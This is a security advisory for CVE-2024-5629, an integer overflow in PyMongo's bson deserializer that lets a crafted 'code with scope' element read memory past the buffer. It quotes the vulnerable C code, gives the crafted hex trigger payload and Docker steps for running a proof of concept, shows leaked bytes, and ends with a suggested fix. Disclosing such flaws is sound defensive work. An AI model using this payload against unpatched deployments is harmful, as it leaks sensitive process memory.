Assigned CVE: CVE-2024-5629
Snyk advisory: SNYK-PYTHON-PYMONGO-7172112
GitHub advisory: GHSA-m87m-mmvp-v9qm
GitHub commit: PYTHON-4305 Fix bson size check (#1564)
Package manager: pip
Affected module: pymongo
GitHub repo: mongodb/mongo-python-driver
Module description:
The PyMongo distribution contains tools for interacting with MongoDB database from Python. The
bson
package is an implementation of the BSON format for Python. Thepymongo
package is a native Python driver for MongoDB. Thegridfs
package is a gridfs implementation on top ofpymongo
.
Out-of-bounds read in bson module. Possible risk: leak of sensitive data.
Vulnerability: integer overflow in bson deserialization. Using the crafted payload the attacker could force the parser to deserialize unmanaged memory. The parser tries to interpret bytes next to buffer and throws an exception with string. If the following bytes are not printable UTF-8 the parser throws an exception with a single byte.
I've tested it on Ubuntu 22.04.3 LTS, kernel version: 5.15.0-84-generic.
There is a simple PoC in file poc.py. The PoC contains two cases:
- leak of the used variable, the arbitrary string from the memory could be leaked the same way
- leak of 5 single non-printable bytes
You could use the provided Dockerfile in order to preserve the environment.
- Build the image
docker build --tag pymongo-poc .
- Run the image
docker run --rm pymongo-poc
- Expected behaviour
$ docker run --rm pymongo-poc
## case 1: leak the printable string ##
Detected unknown BSON type b'\x00' for fieldname 'XXXXXXXXXXXXXX'. Are you using the latest driver version?
## case 2: leak some non-printable bytes ##
'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xff in position 0: invalid start byte
Please note that XXXXXXXXXXXXXX
is a part of the secret
variable. The bytes [0x90, 0xfc, 0x98, 0xf7, 0xff]
could be consecutive bytes from process memory.
Actual source code is here: https://github.com/mongodb/mongo-python-driver/tree/4.6.2
The vulnerability is located in file bson/_cbsonmodule.c. The interesting part is deserialization of type 15 (JavaScript code with scope):
case 15:
{
uint32_t c_w_s_size;
uint32_t code_size;
uint32_t scope_size;
PyObject* code;
PyObject* scope;
PyObject* code_type;
if (max < 8) {
goto invalid;
}
memcpy(&c_w_s_size, buffer + *position, 4);
c_w_s_size = BSON_UINT32_FROM_LE(c_w_s_size);
*position += 4;
if (max < c_w_s_size) {
goto invalid;
}
memcpy(&code_size, buffer + *position, 4);
code_size = BSON_UINT32_FROM_LE(code_size);
/* code_w_scope length + code length + code + scope length */
if (!code_size || max < code_size || max < 4 + 4 + code_size + 4) {
goto invalid;
}
*position += 4;
/* Strings must end in \0 */
if (buffer[*position + code_size - 1]) {
goto invalid;
}
code = PyUnicode_DecodeUTF8(
buffer + *position, code_size - 1,
options->unicode_decode_error_handler);
if (!code) {
goto invalid;
}
*position += code_size;
memcpy(&scope_size, buffer + *position, 4);
scope_size = BSON_UINT32_FROM_LE(scope_size);
if (scope_size < BSON_MIN_SIZE) {
Py_DECREF(code);
goto invalid;
}
/* code length + code + scope length + scope */
if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
Py_DECREF(code);
goto invalid;
}
/* Check for bad eoo */
if (buffer[*position + scope_size - 1]) {
goto invalid;
}
scope = elements_to_dict(self, buffer + *position + 4,
scope_size - 5, options);
if (!scope) {
Py_DECREF(code);
goto invalid;
}
*position += scope_size;
if ((code_type = _get_object(state->Code, "bson.code", "Code"))) {
value = PyObject_CallFunctionObjArgs(code_type, code, scope, NULL);
Py_DECREF(code_type);
}
Py_DECREF(code);
Py_DECREF(scope);
break;
}
The type "code with scope" contains the function code itself (usually JavaScript) and its scope, where the scope is a mapping of closured variables. The code is straightforward so I won't describe it in details.
The vulnerable part is here:
/* code length + code + scope length + scope */
if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
Py_DECREF(code);
goto invalid;
}
Please note that variables code_size
, scope_size
, and c_w_s_size
are controlled by attacker since they are stored in the input buffer as 4-byte integers. Since all variables are uint32_t integers it's possible to trigger integer overflow here. We can set the scope_size
to "negative" value (in unsigned integers it means a "big" value) and bypass the check using crafted code_size
and c_w_s_size
values.
Then the scope_size
is passed to elements_to_dict()
function. If the variable is big enough the function will deserialize the unmanaged memory (next to buffer). This memory will be interpreted as bson structure with fields "type" and "fieldname". If we set the "type" to some invalid value (for example \x00) bson will throw the exception with "fieldname" string.
The example of trigger (from PoC file):
bytes.fromhex(
struct.pack('<I', length).hex() + # payload size
'0f' + # type "code with scope"
'3100' + # key (cstring)
'0a000000' + # c_w_s_size
'04000000' + # code_size
'41004200' + # code (cstring)
'feffffff' + # scope_size
'02' + # type "string"
'3200' + # key (cstring)
struct.pack('<I', string_size).hex() + # string size
'00' * string_size # value (cstring)
# next bytes is a field name for type \x00
# type \x00 is invalid so bson throws an exception
)
The last '00' byte is interpreted as type \x00, the next bytes (located after the managed buffer) will be interpreted as fieldname. Since the type \x00 is invalid the fieldname will be thrown.
There is a check for c_w_s_size
variable only:
if (max < c_w_s_size) {
goto invalid;
}
I would suggest to add the same checks for code_size
and scope_size
variables. Then it becomes impossible to trigger integer overflow here.
Usually the deserialization process is non-trivial and difficult to implement without bugs. I read the entire bson code carefully, especially the use of integer variables, and accidentally found this.
The bug has been fixed in v4.6.3, changelog: https://pymongo.readthedocs.io/en/4.7.0/changelog.html#changes-in-version-4-6-3